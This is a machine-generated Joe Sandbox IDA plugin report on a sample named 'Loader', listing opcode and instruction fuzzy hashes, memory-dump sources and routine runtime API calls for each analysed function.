                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89470cc0488940d690c1fe22c8f68dfd250df9e455205defc72c590a53a5da83
                                                                                      • Instruction ID: a83a41a963a6087e1863f409596edc8868cfe9bc78d8d441ca2cde7b89386531
                                                                                      • Opcode Fuzzy Hash: 89470cc0488940d690c1fe22c8f68dfd250df9e455205defc72c590a53a5da83
                                                                                      • Instruction Fuzzy Hash: 8DB14B71B043205BD7149F25E85277BB3F1EFA1354F59842EE882973A2E73CE905835A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8d2abbd47a2f5b46d84b4e232694b56d94e266da60a63c4d967c6ce50deaf8ef
                                                                                      • Instruction ID: 061b8768e78af104e4c17117a36872e92cb38c42b018d8582a1e6b1f3054508f
                                                                                      • Opcode Fuzzy Hash: 8d2abbd47a2f5b46d84b4e232694b56d94e266da60a63c4d967c6ce50deaf8ef
                                                                                      • Instruction Fuzzy Hash: AFA113B0D052658FCF10CFA4E8815AFBBB1FF16304F54056EE456AB352EB38A805CB59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7cc6b9cbe92ab5099cec445c1032d4262162b57b9cc9ca0a5e45d7cc3fa393de
                                                                                      • Instruction ID: 3ac1cb7e4bcadc193ca211ae18b9f33e40175b25ff917a59ebe0d42e1ff068f3
                                                                                      • Opcode Fuzzy Hash: 7cc6b9cbe92ab5099cec445c1032d4262162b57b9cc9ca0a5e45d7cc3fa393de
                                                                                      • Instruction Fuzzy Hash: 868125B1B043119BD720DF24DC92B6BB7B0EF95354F44491DE9868B3A0E379E904C75A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8c882f1fa9c6bb4de94787cf49243d5f7c4805548d585898e24f74264a47b48d
                                                                                      • Instruction ID: 89763e924d9233c41202dbca0965ada218712063f55dd691c35e4caf33b56213
                                                                                      • Opcode Fuzzy Hash: 8c882f1fa9c6bb4de94787cf49243d5f7c4805548d585898e24f74264a47b48d
                                                                                      • Instruction Fuzzy Hash: 93A10436A087A1CFD7108F28E85031AB7A2BF86320F5A47ADE5D15B3E2C7349C45CB85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 624efac6a3804b6eab79f81e28b8f9bb53497747c791c617f289f8768d3433a1
                                                                                      • Instruction ID: 2d824d26af575893dcd85a6e635c236e4679d5f5d64a03ff8617996701b172d7
                                                                                      • Opcode Fuzzy Hash: 624efac6a3804b6eab79f81e28b8f9bb53497747c791c617f289f8768d3433a1
                                                                                      • Instruction Fuzzy Hash: 9171C27560C2558BC319CE29C89072EBBE2EFC9314F18866EE9E54B382D739D801C796
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8459b55ed261b4b53acfcee2c5bef2be4f7a0a0036de86c0c1c6b7617af0dfe6
                                                                                      • Instruction ID: 85ba7c76edd6e87758ce8e35cf6a6d57cf89e575b2deccdaa4712d8aeb3ad29e
                                                                                      • Opcode Fuzzy Hash: 8459b55ed261b4b53acfcee2c5bef2be4f7a0a0036de86c0c1c6b7617af0dfe6
                                                                                      • Instruction Fuzzy Hash: B3716DB09007019BD3149F28ED4970BBAB5FF4172DF14473DE8AA962E1D375DA24CB8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 70b3f2d3c85860698d213192ea26b03c072d36b4eb5cf2fdbe7e42c0d6ac95ff
                                                                                      • Instruction ID: d8113c9b046043b7981bfad1796629711b46293fe7a73aef34f9d1bb366df537
                                                                                      • Opcode Fuzzy Hash: 70b3f2d3c85860698d213192ea26b03c072d36b4eb5cf2fdbe7e42c0d6ac95ff
                                                                                      • Instruction Fuzzy Hash: 6E51AB78604600AFD724CB18C980A77BBA2EB5A328B55C56DD19747663DB35E882CB18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 638980f4828226e53c8f43cb65d73610e46036654bc281d6ae5e28e36061b068
                                                                                      • Instruction ID: abc68ea3d8c7f8f4d0717a7a5d18772cfcfffcf1ac9f958bd8242077c6f54b18
                                                                                      • Opcode Fuzzy Hash: 638980f4828226e53c8f43cb65d73610e46036654bc281d6ae5e28e36061b068
                                                                                      • Instruction Fuzzy Hash: EC51F2B524C3059BE320DF69D8C0B2BB7E1EBC9308F15993DE5C587291E7B8D842875A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d0eb5b8fe32be4c3b07c0c6195cdd9bfe1ad17a702da4b46120846afdd925de9
                                                                                      • Instruction ID: 825b5af8aaa1b383683c1bf3946cd6b868b73a89040c67c9e97ed2069d3e8edb
                                                                                      • Opcode Fuzzy Hash: d0eb5b8fe32be4c3b07c0c6195cdd9bfe1ad17a702da4b46120846afdd925de9
                                                                                      • Instruction Fuzzy Hash: C931696060C3D05BD7558B3494A17BB7FD08FA7344FA8685DE0D387383D6598845C7A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 20d8b70d1bad769bea0075894b1b8b5f1e709bdeaf7d416f535021e366e4038a
                                                                                      • Instruction ID: 1cfd10ec0fb778c3e141e969c7b1d7d0a44a72106ea7a1ca9735cb8f483c7816
                                                                                      • Opcode Fuzzy Hash: 20d8b70d1bad769bea0075894b1b8b5f1e709bdeaf7d416f535021e366e4038a
                                                                                      • Instruction Fuzzy Hash: A2312238A08200FFE7145F14D8819BFB762EB8672CF94443DE486532A2E73998468B5E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 863c9af9cf3949bda01574a14061b0c92e9f36c798455bf7935defed68cffaa7
                                                                                      • Instruction ID: 991dbbe3932403a9ab021c874169c4d267201d8098497362b4ca5b6f673701f0
                                                                                      • Opcode Fuzzy Hash: 863c9af9cf3949bda01574a14061b0c92e9f36c798455bf7935defed68cffaa7
                                                                                      • Instruction Fuzzy Hash: D13145B4B092914BE71CCF3998A073B7BD3ABD3305F38C96DD4D287295EA3884058749
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd45da81a45b4ccb21ccdb8a5946b47a7132b679f2fddd9be99c3d5d808fa5e0
                                                                                      • Instruction ID: 4c1bf169f7b6847ce570ac5d00c82a55edd37aafdb5c40bd943f1bbe5fab632c
                                                                                      • Opcode Fuzzy Hash: cd45da81a45b4ccb21ccdb8a5946b47a7132b679f2fddd9be99c3d5d808fa5e0
                                                                                      • Instruction Fuzzy Hash: 3D216B74948340ABDB459B74EC42B7B7BE09F67304F10296EF4E1D62E2D6398841871A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 45ac426097ddae568b6d6f0be582a3fdeef0e73baefec1c844c37d95172c74b3
                                                                                      • Instruction ID: d108f646beb0d19f1636abd8836f483173a08574ddd41b81020023eb29ab46de
                                                                                      • Opcode Fuzzy Hash: 45ac426097ddae568b6d6f0be582a3fdeef0e73baefec1c844c37d95172c74b3
                                                                                      • Instruction Fuzzy Hash: EC216870548340ABDB458B78EC82B7BBBE0AF67304F10296DF4E1D62E2D6758841C71A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f18cf9494568a8ffe28ee27ae1d52d822e227b1e69a1b6ebc97e92a81629e39
                                                                                      • Instruction ID: 5190e0ff00ccbe8d4184449f130c68667ccb33f3ab3f2a7fe900281314903c45
                                                                                      • Opcode Fuzzy Hash: 4f18cf9494568a8ffe28ee27ae1d52d822e227b1e69a1b6ebc97e92a81629e39
                                                                                      • Instruction Fuzzy Hash: 26216A78908600DBE7185B14D8815FFB361EB97364F54213DC8D753262D77AAC838B5E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                      • Instruction ID: 1df9c79f6ea7b47aed0b1f040c3407731c6ebdaa0bbe59222c4243ca1f06a822
                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                      • Instruction Fuzzy Hash: EB11E973A051D44EC3168D3C84006E6BFA30ED7234F19539AF4F89B2D6D6279D8B8359
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e96cc6d91942757575559b29eb289ba1f39201a72de1d3ed0c479304f377f9c
                                                                                      • Instruction ID: 8b06c0a675bebe6acc809cdf221f7fd7ffdb0d3e61cda2a6b49494a926b6778d
                                                                                      • Opcode Fuzzy Hash: 5e96cc6d91942757575559b29eb289ba1f39201a72de1d3ed0c479304f377f9c
                                                                                      • Instruction Fuzzy Hash: F70175F1B0031247DB209E55A4C1727B2E9AF91708F58453ED4099B342EB79FC15C69D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c8f9c50519bc8e997d0e6ec327ccb123a447b16039d7c2fc80a974eafd7af67
                                                                                      • Instruction ID: 7f54897619ce99c1decc585b1ae6643afbe93cef710ec5d01a08bcd888c8809d
                                                                                      • Opcode Fuzzy Hash: 7c8f9c50519bc8e997d0e6ec327ccb123a447b16039d7c2fc80a974eafd7af67
                                                                                      • Instruction Fuzzy Hash: BAF0462494D2D18AD3058B398490737BFD18BD3250F1865ADE4C1E73C2C65CC84787AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01f337f5fc58e823ae988b64f3c917c82cd7dd476cb1950829af05d91b390d14
                                                                                      • Instruction ID: 68ee7fb54af6abdc5e805c6bbba856930a941b06853c1a73215de8391e0df626
                                                                                      • Opcode Fuzzy Hash: 01f337f5fc58e823ae988b64f3c917c82cd7dd476cb1950829af05d91b390d14
                                                                                      • Instruction Fuzzy Hash: 23F0503772421607D310DD7DEDC4537F3A6E7C5204B19403DE940E3380C875F805A1A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a15be82605190338e54c53358d3c1d39f9f4a54b9924dccb8ff2242ffb0a2b30
                                                                                      • Instruction ID: c333639d60756fc305cdb18e926c9815f4dc676b5dfd5352cfe17995eaa9baad
                                                                                      • Opcode Fuzzy Hash: a15be82605190338e54c53358d3c1d39f9f4a54b9924dccb8ff2242ffb0a2b30
                                                                                      • Instruction Fuzzy Hash: 64F0E960A4E3D14AE7054A39545077BBFD24BD3240F18659DF4C19B3C6C55DC847922B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7cfaaa316629b702daa8fdb1378e62c9231c9e274a55be684e58b5c78f7cd90
                                                                                      • Instruction ID: 537b329dfd063a598924d90fdfe7ad94f641663cb21e3e908ec1a2fc63290f90
                                                                                      • Opcode Fuzzy Hash: e7cfaaa316629b702daa8fdb1378e62c9231c9e274a55be684e58b5c78f7cd90
                                                                                      • Instruction Fuzzy Hash: C0F08C7A65A6408FC348DB39ACA453BB6E0AB4A250F95A87DA0D3E3650D638C401CE0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ee21b32c18e195838c4b12e9e3239409630268e6a1b0411bbd7641974bc08852
                                                                                      • Instruction ID: 53a1a7e5e8febca9c2738e5e37cb790e6b2132d3876faf512b1b05e9b277e40c
                                                                                      • Opcode Fuzzy Hash: ee21b32c18e195838c4b12e9e3239409630268e6a1b0411bbd7641974bc08852
                                                                                      • Instruction Fuzzy Hash: 7AD05EF86441018FC704CF54EC915367378AB57308F10603AE922C7221C230D4119B0D
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressCloseFileHandleProcSize
                                                                                      • String ID: .bss$0*+$CreateFileA
                                                                                      • API String ID: 2836222988-1726942684
                                                                                      • Opcode ID: 0d2fccd01840c9be2537270730223f92c68378e9c0c4bcabbab06c3e47172f57
                                                                                      • Instruction ID: f306439cce8e6f0c5ba791ae0bc4a9148705a010d98be24bbabee87634da760a
                                                                                      • Opcode Fuzzy Hash: 0d2fccd01840c9be2537270730223f92c68378e9c0c4bcabbab06c3e47172f57
                                                                                      • Instruction Fuzzy Hash: 4371BFB4D14249CFDB00DFA8D588BAEBBF0BF49314F108429E855AB350D774A969CF52
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002B7767
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 002B776F
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002B77F8
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 002B7823
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002B7878
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: 0*+$csm$pp+
                                                                                      • API String ID: 1170836740-448466302
                                                                                      • Opcode ID: 81285870085de87508057a5d377aa5175ff2c300b8503c098a9748c7e7f28b87
                                                                                      • Instruction ID: e0d49c20d64b8229da9acb560bbcb5c68309a7b7002a6ae808b4b3200ebb5a3d
                                                                                      • Opcode Fuzzy Hash: 81285870085de87508057a5d377aa5175ff2c300b8503c098a9748c7e7f28b87
                                                                                      • Instruction Fuzzy Hash: CE41F334E242199BCF10DF68C889ADEBBA5AF84354F148165E8145B392CB71EE25CF91
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                      • String ID:
                                                                                      • API String ID: 127012223-0
                                                                                      • Opcode ID: ef9b16ad8e623c857c09cb07fd03c3157539e4cf8b8c7676f758123910ba53a7
                                                                                      • Instruction ID: 357007e831eaabdfeef1df6828222de11fd713133e563938b13ad40436c9c23d
                                                                                      • Opcode Fuzzy Hash: ef9b16ad8e623c857c09cb07fd03c3157539e4cf8b8c7676f758123910ba53a7
                                                                                      • Instruction Fuzzy Hash: 44710972D20206DBEF319E648C91FEEB7A9DF65310F14015BEC14A7381DA75DC688BA0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 3213747228-0
                                                                                      • Opcode ID: 51e6ba9edb6fa758acba511f911d2998b9b0e2e81ebecee1fdc350593847a06f
                                                                                      • Instruction ID: 960306a9def21ac69925152e3509815427c3ee6eb79e977470d543b7e1003761
                                                                                      • Opcode Fuzzy Hash: 51e6ba9edb6fa758acba511f911d2998b9b0e2e81ebecee1fdc350593847a06f
                                                                                      • Instruction Fuzzy Hash: 7DB18C72920A769FDB158F24CC41FAE7BE5EF15340F14435DE904AB282D2B4F9A1CBA0
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,002C32F1,00000000,00000000,00000000,00000000), ref: 002C32A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: 2503fe27a4291bbb70ca70118ab424eff6ce6cfc97399885e4fe279cb8f02e19
                                                                                      • Instruction ID: 183e748655444b38fe17f810afcff31fed1cb94187e26b8f9f0295e8f87f44a4
                                                                                      • Opcode Fuzzy Hash: 2503fe27a4291bbb70ca70118ab424eff6ce6cfc97399885e4fe279cb8f02e19
                                                                                      • Instruction Fuzzy Hash: 3B212B31A51255ABDF21DF25EC88F5E7768EF02760F144B28ED15AB290D770EE20C6D1
                                                                                      APIs
                                                                                      • __EH_prolog3.LIBCMT ref: 002B3129
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002B3134
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002B31A2
                                                                                        • Part of subcall function 002B302A: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002B3042
                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 002B314F
                                                                                      • _Yarn.LIBCPMT ref: 002B3165
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                      • String ID: 0*+
                                                                                      • API String ID: 1088826258-419236330
                                                                                      • Opcode ID: 2524330b47e9b8b9e9a887726a58588bc07c8b9b02871872aeba6996ba877244
                                                                                      • Instruction ID: 495b9ae747b9c689961cfaacbca3d47534ee98a070126b07f6a86fba48795dd7
                                                                                      • Opcode Fuzzy Hash: 2524330b47e9b8b9e9a887726a58588bc07c8b9b02871872aeba6996ba877244
                                                                                      • Instruction Fuzzy Hash: D501BC31A60251DBCB06EF24E8895BC77B5FF94390B140049E8121B381CF386E66CB81
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,002D2EA9,000000FF,?,002BBE39,002BBD20,?,002BBED5,00000000), ref: 002BBDAD
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002BBDBF
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,002D2EA9,000000FF,?,002BBE39,002BBD20,?,002BBED5,00000000), ref: 002BBDE1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
